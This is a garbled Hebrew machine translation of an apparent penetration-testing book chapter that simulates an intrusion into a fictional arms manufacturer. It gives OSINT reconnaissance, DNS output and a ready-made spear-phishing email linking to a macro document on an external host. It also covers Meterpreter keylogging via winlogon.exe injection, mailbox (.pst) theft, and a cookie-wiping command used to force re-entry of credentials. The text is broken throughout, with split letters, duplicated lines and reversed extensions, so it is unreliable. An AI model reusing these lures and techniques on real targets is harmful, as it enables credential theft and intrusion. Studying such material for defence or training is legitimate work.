‫פגי שת שא לות ות שו בות ע ל עיצו בי הרו בים ש להם‪,‬י ש בדיו ק מה שאתה צריך‪.‬‬
‫מהנד ס עיצו ב רו בים עונה ע ל ה שא לות ש לך באיזו תו כנת ‪CAD‬אתה מ שתמ ש כדי לעצ ב‬
‫את כ לי הנ ש ק ש לך?‬
‫אנו מ שתמ שים ‪ -Solid Edge ST8‬ב כרגע‪ ,‬א ב ל הת ח לנו ‪ -ST 3‬ב גר סאות ‪14,‬אני מאמין‪.‬‬
‫זה מ ספי ק כדי להת חי ל‪Solid Edge .‬היא תו כנת ‪CAD 3D,‬ת כונה פרמ טרית )מ בו ס סת‬
‫הי ס טוריה( ותו כנת מידו ל מוצ ק ב ט כנו לוגיה סינ כרונית‪ .‬הוא פוע ל ע ל ‪Windows‬‬
‫‪ Microsoft‬ומ ספ ק מוד לים מוצ קים‪ ,‬דוגמנות הר כ בה ופונ קציונ ליות ש ל תצוגה אורתוגרפית‬
‫דו‪-‬ממדית ע בור מעצ בים מ כניים‪ .‬כרגע זה ב בע לות ומפות חת ע לידי סימנ ס ‪ AG.‬גר סת‬
‫ני סיון ב חינם זמינה כך שאין שום תירוץ לא להוריד אותה‪ ,‬ק חו אותה מ ס בי ב ל ב לו ק‪ ,‬ור שמו‬
‫את שמות ה ק בצים המר כזיים ותו ספות ק בצי הנתונים ש לו‪ ,‬כך שניתןיהיה לזהות במהירות‬
‫ת חנות ע בודה הנד סיות לא חר חדירת ר שת היעד‪ .‬איור ‪ 5.11‬מציג את סוגי ה ק בצים‪.‬‬
‫איור ‪5.11:‬תי בת דו‪ -‬שי ח ‪ Save As‬מציגה את סוגי ה ק בצים שאיתם ‪ Solid Edge‬עו בד‪.‬‬
‫באופן דומה‪ ,‬ספריית התו כנית ‪Solid Edge‬המוצגת באיור ‪ 5.12‬מפר טת אי לויי שומים‬
‫ל חפ ש‪.‬‬
‫איור ‪ 5.12:‬ספרייתיי שומי ‪Solid Edge.‬‬
‫זיהוי ה ש ח קנים לפני שיוצאים א חרייעדים בודדים‪ ,‬כדאי ל ק ב ל ס קירה כ ל לית ש ל ה ח ברה‬
‫עצמה‪ .‬זה לא חיי ב להיות מפור ט במיו חד א ב ל כמו ב כ ל הי ב ט א חר ש ל דוגמנות ‪APT,‬זמן‬

‫ומאמץ מתוגמ לים באופןי ח סי‪ .‬לפ חות אני רוצה‪:‬‬
‫המ ספר הג ס ש ל העו בדים‬

‫שמות עו בדים ותפ קידים‬
‫פורמ ט כתו בת דואר א ל ק טרוני‬
‫מי קומי ע ס קים‬

‫זה מה שעו ס ק ‪ -OSINT.‬בהז כרתי את לינ קדאין ואתרי ר שת ע ס קיים א חרים בע בר וזה נ שאר‬
‫המ קור הי חיד ה טו ב ביותר למידעיעד‪ .‬ה בעיה הי חידה עם לינ קדאין היא שהיא נו טה לייצגיותר‬
‫מדי תפ קידים ברמה מ קצועית ואנ שי ‪IT.‬זו אמירה מאוד ר ח בה א ב ל שווה ל ש קו ל בהת ח ש ב‬
‫בעו בדה שאני רוצה ל כוון את הנ ש קים ו ל ט כנאי ‪-CNC.‬הזהו כ ל ל אצ בע שאתה רוצה להימנע‬
‫מאנ שיםיותר מ ביני ‪ IT‬כא שר מנ סים לפצ ח את המע טפת ה חיצונית ש ל ר שת‪ ,‬אז זה טו ב שי ש‬
‫לך מ ספר מ קורות מודיעין‪ .‬למ קצועות שוניםי ש ספריות צוות מ ש להם ש בהן תו כ לו למצוא‬
‫קורות חיים ופר טי הת ק שרות; תע שייתייצור הנ ש ק אינה שונה‪.‬‬
‫מידע ע ל מי קום ה ח ברה ניתן לה שיג ב ק לות מאתרים צי בוריים‪ ,‬כפי שהוא‬
‫מידע ע ל מי קום ה ח ברה ניתן לה שיג ב ק לות מאתרים צי בוריים‪ ,‬כפי שהוא‬
‫ספירת העו בדים‪ .‬למה א כפת מ כמה אנ שים עו בדים שם? המ ספר‬
‫ש ל העו בדים נו טה ל ק בוע כיצד בעיות ט כניות נפתרות‪.‬יותר גדו ל‬
‫ס ביר להני ח ש ל ח ברותי ש את כ ל הת שתיות ש להן ב בית ומתו חז קות ע לידיהן‬
‫עו בדים מ ש להם‪ ,‬בעוד ש ח ברות ק טנות מי קור חוץ אפי לו ת שתיות ב סי סיות‪.‬‬
‫זה לא כ ל ל ק שי ח ומהיר‪ ,‬א ב ל שו ב‪ ,‬זה כ ל ל אצ בע טו ב‪ .‬מהיר‬
‫חיפו ש מג לה כי ‪ -Gotham Small Arms‬לי ש פ חות מ‪ 05-‬עו בדים‬
‫שימו ש ‪ -Google Gmail‬ב כדי ל ספ ק שירותי דוא" ל‪:‬‬
‫‪# dig gothamsmallarms.com MX‬‬
‫‪; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> gothamsmallarms.com MX‬‬

‫;;אפ שרויות ג לו ב ליות‪+cmd :‬‬
‫;; קי ב לתי ת שו בה‪:‬‬
‫‪ ;; ->>HEADER<<- opcode: QUERY,‬ס ט טו ס‪NOERROR, id: 47163 :‬‬
‫;;דג לים‪ qr rd ra; :‬שאי לתה‪1, :‬ת שו בה‪ 5, :‬ר שות‪2, :‬נו סף‪:‬‬
‫‪0‬‬
‫;; מדור שא לה‪:‬‬

‫‪;gothamsmallarms.com.‬‬ ‫‪IN‬‬ ‫‪MX‬‬
‫;; סעיף ת שו בה‪:‬‬

‫‪gothamsmallarms.com.‬‬ ‫‪3600‬‬ ‫‪IN‬‬ ‫‪MX‬‬ ‫‪5‬‬
‫‪ALT1.ASPMX.L.GOOGLE.com.‬‬
‫‪ALT2.ASPMX.L.GOOGLE.com.‬‬
‫‪ASPMX.L.GOOGLE.com.‬‬
‫‪ASPMX2.GOOGLEMAIL.com.‬‬
‫‪ASPMX3.GOOGLEMAIL.com.‬‬
‫;; מדור הר שות‪:‬‬

‫‪3595‬‬ ‫‪IN‬‬ ‫נ‪ .‬ס‬
‫‪gothamsmallarms.com.‬‬ ‫‪ns78.domaincontrol.com.‬‬
‫‪3595‬‬ ‫‪IN‬‬ ‫נ‪ .‬ס‬

‫‪gothamsmallarms.com.‬‬ ‫‪ns77.domaincontrol.com.‬‬
‫;;זמן שאי לתה‪154 :‬א לפיות שניות‬

‫;; שרת‪80.69.67.66#53(80.69.67.66) :‬‬
‫;; מתי‪:‬יום ש לי שי ‪ 17‬במאי ‪12:47:30 2016‬‬
‫‪;; MSG SIZE rcvd: 217‬‬
‫זה מעניין‪ .‬אם הם מ שתמ שים ב שירותי הענן המ קצועיים ש ל גוג ל ע בור‬
‫דוא" ל‪,‬יית כן שהם גם מ שתמ שים בהם ל שיתוף מ סמ כים‪ ,‬מה שי כו ל לע שות‬
‫ד ברים ק ליםיותר לגני בת מ סמ כים‪ .‬א ב ל כנראהי ש להם מדיניות ש לא‬
‫ד ברים ק ליםיותר לגני בת מ סמ כים‪ .‬א ב ל כנראהי ש להם מדיניות לפיה זה לאי שמ ש‬
‫ל קניין רו חני רגי ש )או שהם צרי כים ‪ -‬ע בדתי ב ח ברת א ב ט חה שא ח סנה דו חות בדי קת‬
‫ע ט בגוג ל דו ק ס(‪.‬‬
‫פרי סת מ סמ כי ‪ VBA‬ח כמה‬

‫עם ר שימה ש ליעדים‪ ,‬הגיע הזמן ל בנות את המ טען‪.‬‬
‫מו קדםיותר בפר ק זה‪ ,‬בד קתי מ חד ש מנגנון פרי סהיעי ל ביותר‪ :‬מא קרו ‪ VBA.‬בדיון‬
‫המ קורי ב שי טה זו‪ ,‬נע שה שימו ש במיי ל בתור ו ק טור המ סירה; עם זאת‪ ,‬זה לא אופ טימ לי‪.‬‬
‫דוא" ל בדרך כ ל ל נ בד ק ב קפדנות מ כיוון שזו הדרך ה ק לה ביותר ע בור תו כנות זדוניות‬
‫להי כנ ס לר שת ו ס ביר להני ח ש ק בצים מצורפים מ סוימיםיי ח סמו בג בו ל )אפ שר גם פ קודות‬
‫מא קרו הנו שאות מ סמ כי ‪ MS Office).‬כמו כן‪ ,‬מ סירת ק בצים מצורפים בדרך זו פירו שה‬
‫שהראיותיתע כ בו בצורה ש לא תהיה אם ר ק נ ש ל ח קי שור ל קו בץ‪ ,‬למ ש ל‪ .‬עם זאת‪ ,‬גם‬
‫אם ת ש ל ח למ שתמ ש קי שור למ סמך ‪ Word‬ב שרת אינ טרנ ט‪ ,‬זה לאי שנה את העו בדה‬
‫שתו כנת הא ב ט חה הפוע לת בת חנת הע בודה ע שויה לזהות ו ל ח סום אותו ע ק ב‬
‫סיומת ‪ . mcod.‬איך עו קפים את זה?י ש פתרון א ב ל הוא סודי ביותר ומו כר ר ק להא קרים‬
‫המו ב חרים בעו לם‪ .‬אתה מ שנה את שם ה קו בץ ‪ - .doc.‬ל ‪- .docm‬מ‬
‫א ל ת ספר לאף א חד‪.‬‬

‫במ קום ל ש לו ח את המ סמךי שירות ליעדים‪ ,‬אני א ח סן אותו ב שרת אינ טרנ ט חיצוני‬
‫כ קו בץ ‪ doc‬וא ש ל ח ר ק את ה קי שור במיי ל‪ .‬כך‪ ,‬מ סנני דואר אגר סי ביים מדי לאיהוו בעיה‪.‬‬
‫עדיין קיימת ס כנה שניתןיהיה ל חפ ש ק בצים א חר פ קודות מא קרו בג בו ל הר שת‪ ,‬א ב ל זה‬
‫הר בה פ חות מ סו כן מא שר דואר א ל ק טרוני‪ ,‬מ כיוון ש שם צפויים להי כנ ס לר שת רו ב‬
‫התו כנות הזדוניות‪.‬‬
‫הנד סה ח ברתית בעת מ סירת מ סמ כי ‪Office‬היא עניין ש ל נ סי בות ו טעם אי שי‪ ,‬אך‬
‫וריאציות ש ל ה באות מצ לי חות לרו ב‪ .‬לא להדגי ש את הנ קודה א ב לי ש שני ד ברים שאתה‬
‫צריך לע שות נ כון‪:‬‬
‫תן למ שתמ ש ה קצה סי בה מ ש כנעת להפעי ל פ קודות מא קרו‪ .‬המ סמך לא אמור‬
‫ל ספ ק מידע אמיתי למ טרה וצריך להציע בתו קף שנדר שת אינ טרא קציה מא קרו ע ל‬
‫מנת להפוך את המ סמך ל שימו שי או קריא‪ .‬זה גם צריך להיות מ שהו שמו שך את‬
‫העין ומו שך‪.‬‬
‫בת חי לת ה ספר‪ ,‬כת בתי ע ל שימו ש בהודעה שדנה בפי טורים ונראה כי טופ לה בצורה‬
‫לא נ כונה‪.‬י שנן וריאציות ר בות ש ל ההת קפה העוצמתית הזו‪ ,‬א ב ל זה צריך להיות‬
‫מ שהו שמרמז ע ל שינוי נ סי בות ע בור המ ק ל ט ‪ -‬בדרך כ ל ל נ סי בות ש לי ליות ) בה לה‬
‫פוגעת ב ש כ ל הי שר(‪.‬‬
‫התאם את ההת קפה ל ל קו ח‪ .‬זה לא אמור להיראות כמו עוד תרגי ל דיג ענ ק‬
‫שמתע ק ש ש ח ש בונות ‪-PayPal‬ה ש להם נפגעו‪.‬‬
‫ה קדי שו זמן למ ח קר כיצד נראים המ סמ כים ש להם‪ ,‬הי כן ממו קם ה לוגו ו כיצד הוא‬
‫מעוצ ב‪ ,‬באיזה גופן מ שתמ שים ו כו'‪.‬‬
‫גוג ל הוא ה ח בר ש לך א ב ל גם סרו ק את האתרים הפומ ביים ש ל היעד‪ .‬בדרך כ ל ל‬
‫אתהי כו ל למצוא קו בצי ‪ PDF‬ל כ ל הפ חות שיתנו לך עם מה לע בוד‪ .‬לרו ב ה ח ברות‬
‫י ש כתו בת דוא" ל @‪ info‬ש בדרך כ ל ל ת ש ל ח תגו בה או טומ טית‪ ,‬וזה שימו שי לזיוף‬
‫כותרות ת חתונות בדוא" ל‪ .‬אתהי כו ל גם ל ש לו ח מיי ל ‪BCC‬המוני ל כתו בות ש קצרת‬
‫ב כ ל עי לה שתרצה ו לראות מי נו שך‪ .‬ס ביר גם ש לפ חות תי בת דואר נ כנ ס א חת תגי ב‬
‫בהודעת "מ חוץ למ שרד"‪ ,‬שהן שימו שיות מ סי בות ר בות‪ ,‬העיצו ב הוא הפ חות‪ .‬ע כ שיו‬
‫אתהיודע מי לא זמין ) במיו חד בארגון גדו ל(‪ ,‬מה שנותן לך גמי שות מ סוימת אם אתה‬
‫צריך להת חזות לעו בדים מ ב לי שהםי ק ב לו התראה מיידית ע ל עו בדה זו )ראה איור‬
‫‪5.13) .‬‬
‫איור ‪5.13:‬ה קור בן עדייןיצ טרך להפעי ל תו כן א ב ל זו בעיה ש ל הנד סה ח ברתית‪.‬‬
‫ה שא לה כעת היא באיזו גי שה ש ל הנד סה ח ברתית כדאי לה שתמ ש כדי לעורר את‬
‫עניין המ טרה? וריאציה ע ל הודעת הפי טורים הי שנה ש טופ לה ש לא כה ל כה צרי כה‬
‫ל שרת מ ספי ק טו ב‪.‬‬
‫א ל‪target@gothamsmallarms.com :‬‬
‫מאת‪carmine.falcone@gotham-audit.com :‬נו שא‪ ] :‬סודי[ עד כון מיזוג נ ש ק ק ל ש ל‬

‫‪Gothams‬‬
‫היי או סוו לד‪,‬‬
‫אני מ קווה שזהימצא אותך טו ב‪.‬‬
‫צירפתי קי שור למ ספרים שדי ברנו ע ליהם ב ש בוע שע בר‪ ,‬אז אני מ קווה שזה לאיהיהיותר מדי ה לם‪ .‬עם זאת‪ ,‬זה‬
‫עדיין ח סוי לפני האמ ברגו בהתאם ל כ ל לי ‪-FTC,‬האז נא לא להפיץ‪ .‬בהת ח ש ב במ ספר הר ב ש ל עו בדים שעומדים‬
‫להיפ טר כתוצאה מהמיזוג‪ ,‬אני הו לך להמ ליץ ע ליועץ למע בר כי שורים מ קצועיים למ ח ל קה ש לך כ שאראה את כם‬
‫ב ש בוע ה בא‪.‬‬
‫‪http://1.2.3.4/intranet/downloads/gothammerger_v1.4_CF_21032016.doc‬‬
‫ארגמן‬
‫נ‪ .‬ב תן את אה בתי לגר טרוד! *****הודעת סודיות בדוא" ל‬

‫*****‬
‫הודעה זו היא פר טית ו סודית‪ .‬אם קי ב לת הודעה זו ב טעות‪ ,‬אנא הודע לנו וה סר אותה מהמער כת ש לך‪.‬‬
‫דואר א ל ק טרוני ו סי סמאות שמורות‬
‫דרך מהירה ו ק לה לה שיג מודעות למצ ב לא חר שפגע בת חנת הע בודה ש ל מ שתמ ש היא‬
‫לתפו ס את הדוא" ל ש לו בפורמ ט שאתהי כו ל ליי בא ל ל קו ח דוא" ל במ ח ש ב ש לך‪ .‬זהי כו ל‬
‫להיות מ כרה זה ב ש ל מידע‪ ,‬כגון שמות‪ ,‬כתו בות דוא" ל‪ ,‬מ סמ כים ומידע ארגוני א חר ‪-‬‬
‫אפי לו סי סמאות אםי ש לך מז ל גדו ל‪ .‬תתפ לאו כמה אנ שים שומרים גי בוי ש ל ה סי סמאות‬
‫הארגוניות ש להם בגי ליון א ל ק טרוני ש ל ‪ Excel‬ו שו ל חים אותו בדוא" ל לעצמם כגי בוי ‪-‬‬
‫לעזאז ל מדיניות הא ב ט חה‪.‬‬
‫ב ס בי בה ארגונית טיפו סית‪ ,‬למ שתמ שיםיהיה ‪ Microsoft Outlook‬כ ל קו ח דוא" ל ויומן‬
‫ה ק שורים ‪ -Microsoft Exchange.‬ל בדרך כ ל ל‪ ,‬למ שתמ שיםיהיה ר ק גוד ל סופי ש ל‬
‫תי בת הדואר ש ל ‪ Exchange‬והםיידר שו להע ביר מעת לעת מיי לים ל חנות מ קומית אם‬
‫הם רוצים ל שמור אותם‪ .‬ניתן ליי בא את ק בצי )‪-Personal Storage Table (.pst‬הא לה‬
‫ב ק לות ו ל לא כ ל המרה‪ ,‬בין אם בתי בת הדואר הנ כנ ס‪ ,‬פרי טים שנ ש ל חו או כ ל תי קיה‬
‫א חרת‪ .‬א חרת‪Exchange ,‬‬
‫מא ח סן נתוני דוא" ל בפורמ ט )‪ Offline Stored Table (.ost‬מ ש לו ‪ ,‬א שר ) כפי שה שם‬
‫מרמז( מאו ח סנים באופן מ קומי בת חנת הע בודה ש ל ה ל קו ח‪ ,‬ומאפ שר להם לג שת למיי ל‬
‫ש להם גם כא שר הם אינם מ חו ברים ל שרת ‪Exchange.‬‬
‫מי קרו סופ ט טוענת ש לא ניתן ליי באי שירות ק בצי ‪ tso.‬ל ל קו ח א חר ש ל אאו ט לו ק או‬
‫להמיר אותם ל ק בצי ‪ tsp.‬לאותן מ טרות‪ ,‬שאם זה נ כון‪,‬י ס בך את העניינים‪ .‬עם זאת‪,‬‬
‫י שנם מ ספר כ לים זמינים באינ טרנ ט תמורת ת ש לום ק טן שהופ כים המרה כזו לתה ליך‬
‫ב ל חיצה א חת ל לא צורך ב שום מידע א חר כגון פרופי לי ‪MAPI.‬י ש מע ט מאוד ה בד ל בין‬
‫כ לי עזר כא לה אז אני אמנע מ להמ ליץ כאן‪.‬‬
‫ניתן לה שתמ ש ב ט כני קות דומות כדי לגנו ב מיי לים מ ל קו חות דוא" ל א חרים‪ ,‬וזה מ שהו‬
‫שאני רוצה ל ח קור בתרגי לים ה באים‪.‬‬
‫ת חנת ע בודה שנפגעהי כו לה להיות שפע ש ל אי שורים מאו ח סנים‪.‬יי שומים ר בים‬
‫מאפ שרים למ שתמ שים לא ח סן את שמות המ שתמ ש וה סי סמאות ש להם לנו חיותם‬
‫) כ לומר‪ ,‬ל קו ח ‪ SFTP).‬עם זאת‪ ,‬רו ב התו כניותיא ח סנו את ה סי סמאות ה ל לו מוצפנות‪,‬‬
‫בדרך כ ל ל ב קו בץ תצורה מ קומי או ברי שום‪ .‬בנ סי בות א לה‪,‬י שנן שתי הת קפות אפ שריות‪:‬‬
‫פענו ח חנות האי שורים‪ .‬תו כנות מ סוימות רגי שותיותר להת קפה זו מא חרות‪ ,‬אך כ ל‬
‫ט כנו לוגיה קריפ טוגרפית המא ח סנת כמויות ק טנות ש ל נתונים כגון סי סמאות פגיעה‬
‫מ ט בעה להת קפה קריפ טו‪-‬אנ לי טית ) בהנ חה שה סי סמאות אינן ארו כות מדי(‪ .‬חיפו ש‬
‫פ שו ט בגוג לי ספי ק בדרך כ ל ל כדי לג לות כיצד מ קודדת סי סמה ו באי לו כ לים ניתן‬
‫לה שתמ ש כדי ל ש חזר אותה‪.‬‬
‫לא תמיד ניתן ל ש חזר סי סמאות מוצפנות באופן זה אם לא ניתן ל ק בוע את מער כת‬
‫ההצפנה או אם ה סי סמאות ארו כות מ כדי לאפ שר הת קפת הצפנה וה שוואה‬
‫מוצ ל חת‪ .‬במ קרים א לה‪ ,‬זה בדרך כ ל ל מ ספי ק להעתי ק את הגי בו בים המוצפנים‪,‬‬
‫להת קין אתיי שום ה ל קו ח ו ליצור מ חד ש את קו בץ ה כני סה או את ער כי הרי שום‬
‫באופן מ קומי‪ .‬זה לאייתן לך גי שה ל סי סמאות ה לא מוצפנות א ב ליאפ שר לך לג שת‬
‫ליי שומים שהם נועדו לא ב ט ח‪ .‬ל ח לופין‪ ,‬אם פרו טו קו ל ה חי בור שה ל קו ח מ שתמ ש בו‬
‫אינו מוצפן ) כ לומר‪-FTP - ,‬ו ‪Telnet‬אנ שים עדיין מ שתמ שים בהם בר שתות מ קומיות‬
‫ו במ קומות א חרים(‪ ,‬אתהי כו ל לה שתמ ש ב סניפר ר שת ) כגון )‪ Wireshark‬במ ח ש ב‬
‫ש לך כדי לראות את ה סי סמה מוע בר ב בהירות‪.‬‬
‫בתר חי ש זה‪ ,‬היעד הוא מי קור חוץ ש ל צור כי הדוא" ל ש להם ‪ -Google,‬ל מה שמאפ שר‬
‫למ שתמ שים גי שה לתי בות הדואר הנ כנ ס ש להם באמצעות ממ ש ק ‪Gmail‬המו כר‪.‬‬
‫עם זאת‪ ,‬נפוץ ל ח לו טין לראות ע ס קים שעו שים זאת ממ שי כים לה שתמ ש ‪Outlook‬‬
‫‪ -MS‬ב ע ל שו ל חן הע בודה ומ שת ל בים ‪ -backend‬ב ש ל הדואר ש ל גוג ל‪ .‬זה בדרך כ ל ל‬
‫ק שור למור שת‪ ,‬הי כרות ותאימות‪.‬‬
‫ק שור למור שת‪ ,‬הי כרות ותאימות‪.‬‬
‫‪-Cookies Keyloggers‬ו ‪ Keyloggers‬מ שמ שים לגני בת ה ק שות מה קור בנות בזמן‬

‫שהם מ ק לידים והם שימו שיים בעי קר לגני בת סי סמאות‪ .‬ה ק שות נר שמות ל קו בץ לצורך‬
‫א חזור מאו חריותר או מ שודרות חזרה ל‪ 2C-‬בזמן אמת או במרוו חי זמן ק בועים‪ .‬אין‬
‫שום ד בר חד ש או חד שני ב שימו ש ‪ -keylogger,‬בא ב ל זה כ לי לי בה וראוי למי לה א חת‬
‫או שתיים ע ל האופן ש בוי ש לה שתמ ש בו כראוי‪.‬‬
‫מועי ל‪ ,‬ה‪ Metasploit Framework -‬כו ל ל מפת ח לוגר מתאים וממ חי ש מ ספי ק‬
‫לצר כינו‪ .‬כ ח ל ק מ סו כן ‪Meterpreter,‬הוא גם עמיד בפני אנ טי וירו ס עם ה כנה‬
‫מתאימה‪ .‬כמו ב כ ל הת קפה שמ שתמ שת ‪ -Meterpreter,‬בת חי להי ש להע ביר את‬
‫ה סו כן לתה ליךיצי ב א חר לפני ה שימו ש כדי לה ב טי ח שהואיי שאר בזי כרון גם אם‬
‫התה ליך שהו ליד אותויהרוג‪ .‬ל שימו ש כ ל לי‪ ,‬תה ליך ‪ explorer.exe‬מ קו ב ל ל ח לו טין; עם‬
‫זאת‪ ,‬אם המ טרה ש לך היא ל ל כוד אי שורי כני סה ש ל ‪Windows,‬ת חי לה ע ליך להזרי ק‬
‫לתה ליך ‪winlogon.exe .‬‬
‫כאמור‪ Keyloggers ,‬שימו שיים ביותר ל ל כידת שמות מ שתמ ש ו סי סמאות‪ ,‬אך ברור‬
‫שהםיע בדו ר ק אם המ שתמ שי ק ליד את האי שורים ה ל לו‪ ,‬מה ש לאי קרה בנ סי בות‬
‫מ סוימות‪ .‬לדוגמה‪ ,‬בדוגמה ה קודמת דנתי ב סי סמאות מאו ח סנות‪ .‬עם זאת‪ ,‬ס ביריותר‬
‫שתת ק ל ביי שומי אינ טרנ ט ש לאי ב ק שו מהמ שתמ שים סי סמאות מ כיוון שמצ ב ההפע לה‬
‫נ שמר באמצעות שימו ש בעוגיות מתמ ש כות‪.‬‬
‫אתה כמו בןי כו ל לגנו ב את העוגיות מ ספריית הדפדפן כדי ל ח טוף את ההפע לה ש ל‬
‫המ שתמ ש‪ ,‬א ב לי ש הר בה דר כים לה בי ס הת קפות כא לה ) לדוגמה‪ ,‬ה שרת עו ק ב א חר‬
‫כתו בות ‪ IP‬ב ס שן או לא מאפ שר כני סות במ ק בי ל( וי ש הר בה מצ בים ש בהם תרצה את‬
‫האי שורים עצמם‪ .‬א חרי ה כ ל‪ ,‬מ שתמ שים עו שים שימו ש חוזר ב סי סמאות ב כ ליי שומים‬
‫ו ס בי בות‪ .‬בנ סי בות כא לה‪ ,‬הפתרון הוא פ שו ט למ חו ק את העוגיות ו לא לץ את המ שתמ שים‬
‫להי כנ ס בפעם ה באה שהם מ ב קרים בדף האינ טרנ ט‪.‬‬
‫‪ -IE,‬בזה פ שו ט מו שג מ שורת הפ קודה‪:‬‬

‫‪c:> RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2‬‬
‫‪ Chrome‬מא ח סן הי ס טוריה‪ ,‬קו בצי ‪ Cookie,‬מ טמון ו סימניות במ סדי נתונים ו ב ספריות‬
‫שונות ב ספריית הנתונים ש ליי שום ל כ ל מ שתמ ש ב כתו בת‬
‫‪ >\sresU\C:‬שם ‪ >\AppData\Local\Google\Chrome\User Data‬שמת שמ‬
‫הדרך ה ק לה ביותר להיפ טר מ כ ל הנתונים הא לה היא פ שו ט למ חו ק את ה ק בצים המתאימים‬

‫הדרך ה ק לה ביותר להיפ טר מ כ ל הנתונים הא לה היא פ שו ט למ חו ק מ שם את ה ק בצים‬

‫המתאימים‪Chrome .‬יוצר את ה ספרייה הזו באופן או טומ טי אם הוא מג לה שהיא ח סרה‪.‬‬
‫ניתן לה שתמ ש בגי שה דומה ע בור ‪-Safari.‬ו ‪Firefox, Opera‬‬

‫בהת ח ש ב ב כך שהיעד מ שתמ ש בגוג ל לדוא" ל‪ ,‬ס ביר מאוד ש ח ל ק מהמ שתמ שים או כו לם‬
‫י שתמ שו בממ ש ק מ בו ס ס אינ טרנ ט כדי לג שת לתי בות הדואר הנ כנ ס ש להם‪ .‬ה ח שי בות ש ל‬
‫פ קיעת כ ל הפע לות המתמ ש כות הנו כ חיות‪ ,‬לא לץ אותם להזין אי שורים בדפדפן‪ ,‬ברורה‪.‬‬
‫מ ביאים את ה כ ל בי חד‬
‫ל סי כום‪:‬‬
‫בהת קפה זו‪ ,‬גר סה ש ל מא קרו ‪ VBA‬שימ שה כאמצעי לת קיפת מ שתמ ש ה קצה‪,‬‬
‫ק ב לת גי שה לת חנת הע בודה ש ל ה ל קו ח ופרי סה ש ל סו כן ‪C2.‬ה קוד היה מפו ש ט‬
‫במידה ני כרת בה שוואה למה שתואר בפר ק ‪2.‬אין צורך לפרו ס מ טען ‪ VBS‬כדי‬
‫להוריד ו להפעי ל מ טען; פ שו ט ה שתמ ש במה ‪ -Windows‬שנותן לך ב שורת הפ קודה‪.‬‬
‫תי בות דואר נ כנ ס נגנ בו מת חנות הע בודה היעד בצורה ש ל ק בצי ‪ tsp.‬שניתן ליי בא‬
‫ב ק לות למופע מ ש לך ש ל ‪Microsoft Outlook.‬זה מאפ שר לתו קף לג לו ש באימיי לים‬
‫ב ק לות כאי לו היו ש לו‪ .‬ח ש בו ע ל הד ברים שאתם חו ל קים עם ה קו לגות ש ל כם מדייום‬
‫מ ב לי לה שתמ ש בהצפנה‪ .‬אפי לו עם הצפנה‪ ,‬מפת חות פר טייםי כו לים להיגנ ב מת חנת‬
‫הע בודה ומ שפ טי סי סמה ניתן לגנו ב עם מפת חות‪.‬‬
‫סי סמאות דואר ש ל גוג ל נגנ בו באמצעות מפת חות‪ ,‬מה שמאפ שר גי שה לא ר ק לממ ש ק‬
‫הדוא" ל מ בו ס ס האינ טרנ ט‪ ,‬א לא גם ל חנויות מ סמ כים שה ח ש בון מ קו שר א ליהן‪ .‬כ ל‬
‫ל קו ח שמ שתמ ש ב קו בצי ‪ Cookie‬ק בועים נמ ח ק מא ח סנות העוגיות ש להם‪ ,‬מה שאי לץ‬
‫את ה ל קו ח ל בצע אימות מ חד ש ו לאפ שר לתו קף ל ל כוד את האי שורים‪.‬‬
‫ב ש ל ב זה‪ ,‬אפי לו בהנ חה ש ל ש לי טה ר ק ע ל כמה ת חנות ע בודה‪ ,‬הגי שהי כו לה להיות‬

‫מ שמעותית‪ .‬תו קףי כו ל לה ח שיך לפר קי זמן ממו ש כים תוך שמירה ע ל דרי סת רג ל ‪ C2‬מע ל‬
‫המ טרה ו לא ט לא ט להר חי ב את הה שפעה ע ל הר שת‪ .‬ב ש ל ב זה‪ ,‬הד בר הי חיד שצריך‬
‫לע שות הוא ל חפ ש ו ל ח לץ את ק בצי היעד ע ל סמך ה קרי טריונים ש כ בר נ ק בעו‪.‬‬
‫ו כך זה מו כי ח )ראה איור ‪5.14).‬‬

‫איור ‪ 5.14:‬ס כימה ש ל מ ק ל ט ת חתון ‪ -Solid Edge 3D.‬ב‬

‫מ קור‪ :‬ע בודה עצמית‬
‫סי כום‬
‫מתוך כור ח‪ ,‬הר בה מידע חד ש נד ח ס בפר ק זה‪ .‬בד קנו את הפי קוד וה ש לי טה ה סמויים‪,‬‬
‫את ה ס כנה ה קיימת תמיד ש ל תו כנות כופר‪ ,‬ו כיצד המודעות לאיום הזה צרי כה‬
‫לה שת ל ב בתרגי ל דוגמנות ‪ APT.‬כי סינו דר כים שונות לה שתמ ש ב ט כנו לוגיה מו כרת‬
‫כ בר כדי לפצ ח א ב ט חת ג בו לות ודר כים ח לופיות לע קוף את ט כנו לוגיית האנ טי וירו ס‪.‬‬
‫ל ב סוף‪ ,‬נדונו המו שגים ש ל ‪ keyloggers,‬גני בת דואר א ל ק טרוני ו סי סמאות מוצפנות‬
‫במ טמון‪.‬‬
‫הפר ק ה בא אינו שונה‪ .‬הר בה מו שגים חד שיםיי ס קרו‪ .‬לא פ חות מ כך‪ ,‬אנו נ ס קור לעומ ק‬
‫את ט כני קות ה ס למה ש ל הר שאות‪ .‬זוהי מיומנות לי בה ש ל דוגמנות ‪ APT‬שעד כה ר ק‬
‫נגענו בה‪.‬‬
‫‪1.‬י שנם מ ספר ל קו חות דוא" ל ח לופיים שי כו לים ל שמ ש כת ח ליף ‪Outlook.‬‬
‫‪ -Microsoft‬ל ל ח ל קםי ש אינ טגרציה ש ל ‪ Exchange‬ו ל ח ל קם לא‪.‬‬
‫בדו ק כיצד ניתן לגנו ב תי בות דואר א ל ק טרוני מת חנות ע בודה עם ה‬
‫מות קנים את ל קו חות הדואר ה באים‪:‬‬

‫אופרה מיי ל‬
‫‪Dreammail‬‬
‫‪i.Scribe‬‬
‫תי בת דואר‬
‫א בו לוציה‬
‫‪ 2.‬ע ליך לת קוף מאר ח הנגי ש ר ק דרך ר שת ‪ Tor‬במ ב חן חדירת ר שת מ סורתי‪ .‬מיד תת ק ל‬
‫ב בעיות ‪ DNS‬שיפתרו את כתו בות ה‪ . noino.-‬איך הייתם פותרים את ה בעיות הא לה כדי‬
‫שתו כ לו לה ביא את ה כ לים האהו בים ע לי כם נגד המ טרה?‬
‫‪3.‬תאר לעצמך שאתה מפעי ל שירות נ סתר ש ל ‪ Tor‬כדי ל ספ ק ע ס ק מ קוון ב שו ק ה ש חור‪.‬‬

‫ח שו ב ע ל כמה דר כים ש בהן האנונימיות ש ל שרת האינ טרנ ט ש לך ע לו לה להיפגע ו כיצד‬
‫תו כ ל להגן ע ל עצמך מפניהן‪ .‬קרא ע ל רו ס או ל ברי כ ט ודרך המ שי לה ק שר‪.‬‬
